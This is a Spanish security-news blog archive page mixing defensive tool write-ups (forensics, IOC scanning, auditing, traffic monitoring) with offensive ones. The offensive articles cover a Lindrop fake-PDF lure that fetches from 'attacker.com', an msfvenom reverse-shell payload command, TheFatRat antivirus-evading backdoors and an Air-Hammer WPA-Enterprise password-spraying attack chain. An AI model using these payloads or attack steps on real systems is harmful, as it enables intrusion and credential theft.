Month: November 2016
En la BMV, desprotegidas las firmas ante ciberataques
los hackers consiguen hasta US600,000 millones al año por invasiones, según especialistas en el tema de ciberseguridad. Desprotegidas y sensibles ante un ataque cibernético. Así se encuentran las emisoras de la Bolsa Mexicana de Valores (BMV). Especialistas coincidieron en que un ataque a sus computadoras, redes e información podría mermar notablemente sus operaciones y afectar sus finanzas. Sin embargo, no se protegen adecuadamente.
Expertos en ataques cibernéticos coincidieron en que las empresas en general y en específico las que cotizan en Bolsa destinan bajo presupuesto a su protección cibernética.
Los sectores que más ataques cibernéticos reciben son el financiero y de comercio electrónico.
Datos del International Institute of Cyber Security indican que en el 2016 cerca de 78% de las empresas en México han sido blanco de un ataque por medio de Internet.
A pesar de que ha ido en incremento el presupuesto para dicha área, firmas que cotizan en la BMV destinan solamente entre 5 y 8% de su presupuesto a ciberseguridad, porcentaje menor al de las empresas que cotizan en Nasdaq, que destinan entre 7 y 11% de su presupuesto para protegerse de ciberataques.
Dicha institución recomienda a una empresa en Bolsa una inversión anual contra ataques cibernéticos de entre 700,000 a 30 millones de dólares.
Compromiso bajo “El nivel de compromiso para implementar ciberseguridad es bajo ya que sólo 45% de las empresas tiene una estrategia robusta de ciberseguridad y sólo 40% realiza evaluaciones regulares de ciberseguridad”, aseguró German Ruiz, consultor de Seguridad Cibernética-Ethical Hacking en International Institute of Cyber Security.
Marco DeMello, CEO de PSafe, aplicación de defensa contra ataques cibernéticos para teléfonos celulares, dijo que “todavía no están protegidas suficientemente las empresas contra un ciberataque. Son muy vulnerables. Y es que muy pocas empresas que son invadidas lo reportan, entonces no hay una legislación en América Latina para que las empresas que son comprometidas lo reporten al gobierno, no hay obligación legal, más que en Estados Unidos”.
Ruiz agregó que una empresa del tamaño de las que cotizan en Bolsa o internacionales recibe anualmente entre 2 a 10 millones de ataques cibernéticos, de los cuales, entre 2 y 5% son consumados.
Pérdidas millonarias
Sin embargo, a pesar de que el porcentaje es bajo, las pérdidas son cuantiosas a nivel mundial.
“El mercado de ataques cibernéticos en el mundo asciende a 600,000 millones de dólares, aunque dependen del tamaño de la empresa y tipo de negocio.
El costo por la reparación de daños es de entre 10,000 a 50,000 dólares para las pequeñas empresas y entre 50,000 a 150 millones de dólares, para las grandes”, consideró el consultor de Seguridad Cibernética.
IR-RESCUE: UNA HERRAMIENTA DE CÓDIGO ABIERTO PARA FORENSE Y RESPUESTA DE INCIDENTES
Ir-rescue es un script ligero de Windows Batch que recopila unos numerosos de datos forenses de sistemas Windows de 32 bits y 64 bits respetando el orden de volatilidad y artefactos que se cambian con la ejecución del script. Se destina a la respuesta a incidentes utilizándose en diferentes etapas del proceso de digital forensic e investigación. Puede ser configurado para realizar colecciones completas de datos para fines de digital forensic e investigación, así como personalizar adquisiciones de tipos específicos de datos. La herramienta representa un esfuerzo para agilizar la recolección de datos de máquina, independientemente de las necesidades de la digital forensic y confiar menos en el soporte in sitio cuando el acceso remoto o el análisis en vivo no están disponibles.
Ir-rescue hace uso de comandos integrados de Windows y utilidades de terceros bien conocidas de Sysinternals y NirSoft, por ejemplo, algunas de código abierto. Está diseñada para agrupar las colecciones de datos según el tipo de datos. Por ejemplo, se agrupan todos los datos relacionados con la conexión en red, como los recursos compartidos de archivos abiertos y las conexiones TCP (Protocolo de control de la transmisión), mientras que los procesos, los servicios y las tareas se agrupan bajo malware. La herramienta de digital forensic también está diseñada con el propósito de no hacer uso de PowerShell y WMI (Windows Management Instrumentation) para que sea compatible transversalmente. La adquisición de tipos de datos y otras opciones generales se especifican en un archivo de configuración simple. Cabe señalar que el script lanza un gran número de comandos y herramientas, dejando una huella considerable en el sistema. El tiempo de ejecución varía dependiendo de la potencia de cálculo y de las configuraciones establecidas, aunque suele terminar dentro de un máximo de una hora si está configurado para ejecutarse completamente. Ir-rescue es una de las herramientas usada por los expertos de digital forensic de international institute of cyber security.
Ir-rescue ha sido escrito para la respuesta a incidentes y digital forensic, así como para los profesionales de la seguridad por igual. Por lo tanto, puede utilizarse para aprovechar las herramientas y comandos ya agrupados durante las actividades de digital forensic.
Ir-rescue se basa en una serie de utilidades de terceros para recopilar datos específicos de las maquinas. Las versiones de las herramientas se enumeran en la siguiente sección y se proporcionan con el paquete tal cual y, por lo tanto, sus licencias y acuerdos de usuario deben aceptarse antes de ejecutar ir-rescue.
Ir-rescue debe ejecutarse bajo una consola de línea de comandos con derechos de administrador y no requiere argumentos.
LINDROP – UN VECTOR DE INGENIERÍA SOCIAL PARA LOS OBJETIVOS LINUX
Según expertos de seguridad perimetral y seguridad lógica, la ingeniería social es el arte de manipular a las personas para que entreguen información confidencial. Los tipos de información que estos criminales están buscando puede variar, pero cuando los individuos son atacados, los criminales suelen tratar de engañarlos para que les den sus contraseñas o información bancaria, o acceder a su computadora para instalar en secreto software malintencionado que les dará acceso a sus contraseñas e información bancaria, así como el control de su computadora.
Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) “malicioso” que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha.
Los cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.
Básicamente explota la sección “Exec” de un archivo .desktop para:
- Descargue un PDF y muéstrelo al usuario.
- Descargue y ejecute una linux/x86/meterpreter/reverse_tcppayload
Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas:
Un nombre de salida para el archivo “PDF” (.desktop) que estará en el archivo zip.
Un nombre de salida para el archivo almacenado.
Una URL de carga útil remota. (http://www.attacker.com/payload) esto se descargará en el directorio / tmp en el equipo de destino. Para este ejemplo, simplemente estamos creando una carga útil con msfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload
Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota Blackhat 2016’s Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF.
En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom.
Según los expertos de seguridad lógica, las soluciones de seguridad tradicional no detectaran un ataque de este tipo.
¿CÓMO GENERAR FÁCILMENTE UNA PUERTA TRASERA PARA LINUX, WINDOWS, MAC Y EVITAR EL ANTIVIRUS?
Una puerta trasera es un medio de acceso a un programa informático que evita los mecanismos de ciberseguridad. Un programador de ciberseguridad algunas veces puede instalar una puerta trasera para que se pueda acceder al programa para solucionar problemas de ciberseguridad o para otros fines. Sin embargo, los atacantes suelen utilizar puertas traseras que se detectan o se instalan, como parte de una vulnerabilidad.
En este artículo vamos a discutir una herramienta con la ayuda de expertos de cloud security de iicybersecurity IICS. La herramienta se llama TheFatRat que puede ser utilizada para generar una puerta trasera para Linux, Windows, Mac y evitar AntiVirus.
Según expertos de ciberseguridad y cloud security, TheFatRat es una herramienta fácil de generar puerta trasera con msfvenom (una parte de metasploit Framework). Esta herramienta recopila un malware con una carga útil popular y luego el malware compilado se puede ejecutar en Windows, Mac, Android. El malware que se crea con esta herramienta también tiene la capacidad de pasar por alto la mayor parte de protección de software de Anti Virus. Según su creadores y expertos de ciberseguridad, la puerta trasera, se ejecuta automáticamente si la victima desactiva el uac (user acces control).
UAC es una característica de ciberseguridad de Windows Vista, Windows 7 y Windows 8, que ayuda a evitar cambios no autorizados en el equipo. Estos cambios pueden ser iniciados por aplicaciones, virus u otros usuarios. User Account Control se asegura de que estos cambios se realizan sólo con la aprobación por parte del administrador. Si los cambios no han sido aprobados por el administrador, ellos no se ejecutan y Windows se mantiene sin cambios. Es como si nada hubiera pasado menciona experto de cloud security.
La herramienta de ciberseguridad revisa el servicio de Metasploit y se inicia si no está presente y pueden crear fácilmente meterpreter reverse_tcp playloads para Windows, Linux, Android y Mac.
TheFatRat ha sido creado para hacer frente a los problemas generales que enfrentan los profesionales de ciberseguridad y cloud security. La herramienta se puede iniciar varias meterpreter reverse_tcp listners y hacer una búsqueda rápida en searchsploit.
Los expertos de ciberseguridad han estado utilizando esta herramienta para eludir antivirus, ejecutar Auto run script para los listeners.
Esta herramienta es parte de sistema operativo hacking ético, Dracos Linux
REQUERIMIENTOS
- Un sistema operativo Linux. Expertos en ciberseguridad recomiendan Kali Linux 2 o Kali 2.016,1 rolling / Cyborg / Parrot / Dracos / BackTrack / Blackbox / y otro sistema operativo (Linux)
- Debe instalar metasploit Framework
¿CÓMO MONITOREAR EL TRÁFICO DE RED EN LINUX?
Con ayuda de expertos de ethical hacking y test de intrusión, en este artículo menciona algunas herramientas de línea de comandos de Linux que se pueden utilizar para monitorear el tráfico de red. Estas herramientas supervisan el tráfico que fluye a través de las interfaces de red y miden la velocidad a la que se están transfiriendo datos. El tráfico entrante y saliente se muestra por separado. Algunos de los comandos muestran el ancho de banda utilizado por los procesos individuales. Esto hace que sea fácil de detectar un proceso que este sobre utilizando en el ancho de banda de la red durante test de intrusión.
Aquí está una lista de los comandos, ordenadas según sus características
NLOAD
Nload es una herramienta de línea de comandos que permite a los usuarios controlar el tráfico entrante y saliente por separado. Que también atrae hacia afuera a un gráfico para indicar el mismo, la escala de los cuales se puede ajustar. Según curso de ethical hacking es muy fácil y sencillo de utilizar, y no es compatible con muchas opciones.
$ sudo apt-get install nload $ nload
IFTOP
Iftop mide los datos que fluyen a través de conexiones de socket individuales, y funciona de una manera diferente de Nload. Aunque iftop informa el ancho de banda utilizado por las conexiones individuales, no puede informar nombre / identificación del proceso involucrados en la conexión de socket en particular. Sin embargo, basándose en la biblioteca pcap, iftop es capaz de filtrar el tráfico de ancho de banda e informar sobre las conexiones de host seleccionados según lo especificado por el filtro.
$ sudo apt-get install iftop $ sudo iftop -n
Según consultores de test de intrusión, la opción n previene a iftop de resolver direcciones IP a nombre del host, lo que causa tráfico de la red adicional a sí mismo.
IPTRAF
Iptraf es un monitor de LAN interactivo y colorido. Muestra las conexiones individuales y la cantidad de datos que fluyen entre los anfitriones y es usado por experto de ethical hacking. Aquí está una captura de pantalla
$ sudo apt-get install iptraf iptraf-ng $ sudo iptraf
NETHOGS
Nethogs es una pequeña herramienta de ‘net top’ que muestra el ancho de banda utilizado por los procesos individuales y ordena la lista poniendo los procesos más intensivos en la parte superior. En el caso de un repentino aumento de ancho de banda, de forma rápida abre nethogs y encuentra el proceso responsable explican expertos de ethical hacking y test de intrusión. Nethogs informa de PID, el usuario y la ruta de acceso del programa.
$ sudo apt-get install nethogs $ sudo nethogs
SLURM
Slurm es otro monitor de carga de red que muestra las estadísticas del dispositivo junto con un gráfico ASCII. Es compatible con 3 estilos diferentes de cada uno de los gráficos que se pueden activar. Simple en funciones, slurm no muestra más detalles sobre la carga de la red.
$ sudo apt-get install slurm $ slurm -s -i eth0
TCPTRACK
Tcptrack es similar a iftop, y utiliza la biblioteca pcap para capturar paquetes y calcular varias estadísticas como el ancho de banda utilizado en cada conexión explican expertos de ethical hacking y test de intrusión. También es compatible con los filtros pcap estándar que pueden ser utilizados para controlar las conexiones específicas.
$ sudo apt-get install tcptrack
VNSTAT
VnStat es poco diferente de la mayoría de las otras herramientas menciona Mike Stevens experto de test de intrusión de International Institute of Cyber Security. Esto realmente ejecuta un servicio en segundo plano / daemon y sigue grabando el tamaño de la transferencia de datos todo el tiempo. A continuación puede ser utilizado para generar un informe de la historia de uso de la red. VnStat es más como una herramienta para obtener informes históricos de cuánto ancho de banda se utiliza todos los días o durante el mes pasado. No es estrictamente una herramienta para el monitoreo de la red en tiempo real.
$ sudo apt-get install vnstat
BWM-NG
BWM-ng (Bandwidth Monitor Next Generation) es otro monitor de carga de la red en tiempo real muy simple que reporta un resumen de la velocidad a la que se están transfiriendo datos dentro y fuera de todas las interfaces de red disponibles en el sistema.
$ bwm-ng
CBM – COLOR BANDWIDTH METER
Un diminuto monitor simple de ancho de banda que muestra el volumen de tráfico a través de las interfaces de red. No hay más opciones, sólo las estadísticas de tráfico son la pantalla y actualizado en tiempo real.
$ sudo apt-get install cbm
SPEEDOMETER
Otra herramienta pequeña y sencilla que simplemente extrae buenos gráficos en busca de tráfico entrante y saliente durante test de intrusión a través de una interfaz dada.
$ sudo apt-get install speedomete $ speedometer -r eth0 -t eth0
PKTSTAT
Pktstat muestra todas las conexiones activas en tiempo real, y la velocidad a la que se están transfiriendo datos a través de ellos y es usado por expertos de ethical hacking. También muestra el tipo de la conexión.
$ sudo apt-get install pktstat $ sudo pktstat -i eth0 -nt
NETWATCH
Netwatch es parte de la colección de herramientas netdiag, y también muestra las conexiones entre el anfitrión local y otros equipos remotos, y la velocidad a la que se transfieren datos en cada conexión durante test de intrusión.
$ sudo apt-get install netdiag $ sudo netwatch -e eth0 –nt
TRAFSHOW
Esto informa de las conexiones activas actuales, su protocolo y la velocidad de transferencia de datos en cada conexión. Sólo monitorea las conexiones TCP
$ sudo apt-get install netdiag $ sudo trafshow -i eth0 tcp
NETLOAD
El comando Netload simplemente muestra un pequeño informe sobre la carga de tráfico actual y el número total de bytes transferidos desde el inicio del programa.
$ sudo apt-get install netdiag $ netload eth0
DSTAT
Dstat es una herramienta versátil (escrito en Python por expertos de ethical hacking) que puede controlar diferentes estadísticas del sistema e informar de ellas en un modo de estilo de lotes o registrar los datos a un archivo CSV o similar. Este ejemplo muestra cómo utilizar dstat para reportar el ancho de banda de la red durante test de intrusión.
$ sudo apt-get install dstat$ dstat -nt
COLLECTL
Collectl informa de las estadísticas del sistema en un estilo y se recoge estadísticas sobre los diversos diferentes recursos del sistema como CPU, memoria, red, etc.
$ sudo apt-get install collectl$ collectl -sn -oT -i0.5
¿CÓMO HACKEAR LA RED WPA EMPRESARIAL CON AIR-HAMMER?
Ataques de fuerza bruta en línea contra la red WPA empresarial que parecen ser pasadas por alto, si no desconocidas, en la literatura actual sobre la seguridad de la red inalámbrica y en la comunidad de seguridad o pentesting en general. Aunque la red WPA empresarial a menudo se considera “más seguro” que WPA-PSK, que también tiene una superficie de ataque mucho más grande según expertos de pruebas de penetración. Mientras que las redes WPA-PSK sólo tienen una contraseña válida, puede haber miles de combinaciones de nombre de usuario y una contraseña válida que conceda acceso a una única red WPA empresarial. Acuerdo a reportes de pentesting, las contraseñas utilizadas para acceder a red WPA empresarial están comúnmente seleccionadas por los usuarios finales, muchos de los cuales seleccionan contraseñas extremadamente comunes.
CÓMO FUNCIONA EL AIR HAMMER
Air Hammer requiere como mínimo los siguientes parámetros para un hacer ataque:
- La interfaz inalámbrica para ser utilizada
- El nombre de la red (SSID) de la red inalámbrica esté a la que está destinada durante pruebas de penetración.
- Una lista de nombres de usuario objetivo
- Una contraseña o una lista de contraseñas para ser analizados para cada nombre de usuario
Air Hammer entonces intenta la autenticación en la red objetivo al tratar la contraseña proporcionada con cada nombre de usuario en la lista. Si se proporciona más de una contraseña, cada nombre de usuario es intentado con la primera contraseña antes de pasar a la siguiente contraseña.
Los expertos de pentesting han creado Air Hammer y dicen que interactuar con los nombres de usuario en lugar de las contraseñas es ventajoso porque:
- Hay una probabilidad mucho más alta que podamos adivinar la contraseña de al menos uno, de entre todos los usuarios de la organización que la probabilidad de que podemos adivinar la contraseña de un usuario único, específico en la organización.
- Debido a la cuenta de políticas de bloqueo comúnmente en su lugar, es posible hacer muchas veces más intentos de conexión dentro de un plazo determinado mediante la difusión de ellas a través de múltiples cuentas de usuario.
Después se descubrió un conjunto válido de credenciales, el nombre de usuario y la contraseña se muestran en la pantalla. En función de los parámetros utilizados, las credenciales opcionalmente se pueden guardar en un archivo de salida, y el ataque puede ser terminado en el primer éxito o permitido que continúe.
CADENA DE ATAQUE TÍPICO DURANTE PENTESTING
La cadena de ataque típico durante pentesting para los ataques realizados con Aire-Hammer es la siguiente:
Identificar la red de destino y el mecanismo de autenticación en uso. La versión actual del Air Hammer sólo es compatible con PEAP / MSCHAPv2. Los investigadores de pruebas de penetración añadirán los mecanismos de autenticación adicionales en versiones futuras.
Generar una lista de nombres de usuario para su uso en el ataque. Identificar el formato de nombre de usuario utilizado por la organización. Las fuentes posibles incluyen:
- Los nombres de usuarios almacenados dentro de los metadatos de los archivos disponibles en el sitio web de la empresa.
- La primera mitad de direcciones de correo electrónico corporativo. (La parte antes de la “@”).
- Los nombres de usuario capturados durante un ataque “Evil Twin” de la red destino.
- Hacer una lista de los nombres y apellidos de los mayoria de los empleados de la organización como sea posible. Las fuentes posibles: 1. El sitio web empresarial 3. Data.com 3. LinkedIn
- El uso de la información obtenida de los pasos anteriores durante pentesting, generara una lista de nombres de usuarios potenciales.
Uso de Air-Hammer para descubrir las credenciales válidas.
Uso de credenciales descubierto para acceder a la red inalámbrica.
Muchas empresas de pentesting usan herramientas como de Air Hammer para hacer pruebas de penetración. Los expertos de pentesting de IICS International Institute of Cyber Security mencionan que desde credenciales la empresa WPA que son a menudo de dominio de las credenciales del usuario, utilice las credenciales descubiertas para acceder a sistemas adicionales en la red interna e iniciar ataques adicionales.
https://github.com/Wh1t3Rh1n0/air-hammer/
¿CÓMO DETECTAR SI LA RED EMPRESARIAL HA SIDO HACKEADO?
IOC (indicator of compromise) – una lista de datos de amenazas (por ejemplo, secuencias que definen las rutas de archivos o claves de registro) que pueden utilizarse para detectar una amenaza en la infraestructura mediante el análisis basado en software automatizado de ethical hacking.
Simples escenarios de ciberseguridad de uso del IOC implican localizar el sistema de archivos específicos usando una variedad de criterios de búsqueda: hash MD5, nombres de archivo, fecha de creación, tamaños y otros atributos. Además, la memoria puede ser buscada por diversos signos específicos de la amenaza y en registros de Windows pueden buscar registros específicos según expertos de ethical hacking de International Institute of Cyber Security.
Estos datos se pueden presentar en una variedad de formatos. Los diferentes formatos permiten que los datos se importen en diferentes soluciones de ciberseguridad y ethical hacking para proporcionar el tratamiento posterior de los indicadores. Un administrador de ethical hacking puede integrar IOCs tomado de los reportes en soluciones de ciberseguridad tales como:
- Las soluciones de Endpoint Security
- SIEM
- IDS/IPS
- HIDS/HIPS
- Herramienta de investigación de ethical hacking sobre varios incidentes
Hay muchas soluciones comerciales de ciberseguridad para trabajar con IOC, pero en muchos casos las capacidades de los programas de código abierto similares son suficientes para comprobar en sistema en busca de signos de infección. Un ejemplo es Loki.
Loki es un sencillo y gratuito IOC scanner. Estos indicadores se pueden derivar de los informes de incidentes publicados, los análisis forenses o colecciones de muestras de malware en su laboratorio.Creado por expertos de ethical hacking, LOKI ofrece una forma sencilla de escanear tus sistemas de IOCs conocidos.
Es compatible con estos diferentes tipos de indicadores:
- Hash MD5 / SHA1 / SHA256
- Reglas de Yara (aplicado al archivo de datos y memoria de proceso)
- Los nombres de archivo Hard indicador basados en la expresión regular
- Los nombres de archivo Soft indicador basado en expresiones regulares
LOKI cuenta con algunas de las reglas más eficaces tomadas de los conjuntos de reglas de Thor APT escáner. Los expertos de ethical hacking, decidieron integrar una gran cantidad de reglas WebShell ya que incluso los mejores antivirus no pueden detectar la mayoría de ellos.
La base de firmas IOC no está cifrada o se almacena en un formato de propietario. Puede editar la base de firmas de por ti mismo y añadir tu propio IOCs. Ten en cuenta que los atacantes también pueden tener acceso a estas reglas en los sistemas de destino si usas el escáner y dejas el paquete en un sistema comprometido.
Puedes añadir fácilmente tus propios valores hash, las características de nombre de archivo y las normas de Yara para los conjuntos de reglas que vienen con él. Y por estos razones muchas empresas de de ciberseguridad usan productos como Loki. Otro escenario es el uso en un laboratorio forense. Escanear imágenes montadas con LOKI para identificar amenazas de ciberseguridad conocidas utilizando las definiciones proporcionadas por IOC.
Al final de la exploración LOKI genera un resultado de la exploración. Este resultado puede ser:
- El sistema parece estar limpio.
- ¡Objetos sospechosos detectados!
- ¡Indicadores detectados!
LYNIS: HERRAMIENTA DE AUDITORÍA DE SEGURIDAD PARA UNIX/LINUX SYSTEMS
Lynis es una herramienta de auditoría de seguridad de código abierto. Utilizado por los administradores de sistemas, profesionales de pentesting, y los auditores, para evaluar la ciberseguridad de sus sistemas Linux y UNIX. Se ejecuta en el propio host, de forma que realice análisis de pentesting y ciberseguridad más amplios que escáneres de vulnerabilidades.
SISTEMAS OPERATIVOS COMPATIBLES
La herramienta de pentesting y ciberseguridad casi no tiene dependencias, por lo que se ejecuta en casi todos los sistemas y versiones basadas en Unix, incluyendo:
- AIX
- FreeBSD
- HP-UX
- Linux
- Mac OS
- NetBSD
- OpenBSD
- Solaris
- and others
Incluso puede funcionar en sistemas como el Raspberry Pi y varios dispositivos de almacenamiento!
¿CÓMO FUNCIONA?
Lynis lleva a cabo cientos de pruebas de pentesting individuales, para determinar el estado de ciberseguridad del sistema. El análisis de ciberseguridad en sí consiste en realizar una serie de pasos, desde la inicialización del programa, hasta el informe.
PASOS
- Determinar sistema operativo
- Búsqueda de herramientas y utilidades disponibles
- Buscar actualizaciones Lynis
- Ejecutar pruebas de plugins
- Ejecutar pruebas de pentesting por categoría
- Informe del estado del análisis de ciberseguridad
Además de los datos que se muestran en la pantalla, todos los detalles técnicos de la exploración se almacenan en un archivo de registro. Cualquier resultado (advertencias, sugerencias, la recopilación de datos) se almacena en un archivo de informes. Lynis es una de las herramientas enseñada por los expertos de pentesting.
ESCANEO OPORTUNISTA
El escaneo lynis es oportunista: utiliza lo que se puede encontrar.
Por ejemplo, si ve que está ejecutando Apache, se llevará a cabo una ronda inicial de pentesting relacionadas con Apache. Si durante el escaneo Apache también descubre una configuración de SSL / TLS, se llevarán a cabo pasos adicionales de auditoría al respecto.
LOS ESCANEOS DE CIBERSEGURIDAD A PROFUNDIDAD
Mediante la realización de la exploración oportunista, la herramienta puede funcionar con casi ninguna dependencia. Cuanto más encuentra, más profunda la prueba de pentesting será. En otras palabras, siempre Lynis realizará exploraciones, personalizadas a tu sistema.
CASOS DE USO
Según expertos de ciberseguridad, Lynis es flexible, se utiliza con varios fines diferentes. Casos de usos típicos para Lynis incluyen:
- La auditoría de ciberseguridad
- Pruebas de cumplimiento (por ejemplo, PCI, HIPAA, SOX)
- Detección de la vulnerabilidad y la digitalización
- Endurecimiento de sistema
LOS RECURSOS UTILIZADOS PARA LAS PRUEBAS
Muchas otras herramientas utilizan los mismos archivos de datos para la realización de pruebas de pentesting. Desde que Lynis no se limita a unas pocas distribuciones comunes de Linux, que utiliza las pruebas de estándares y muchas otras costumbres que no se encuentran en ninguna otra herramienta.
Cyber Security 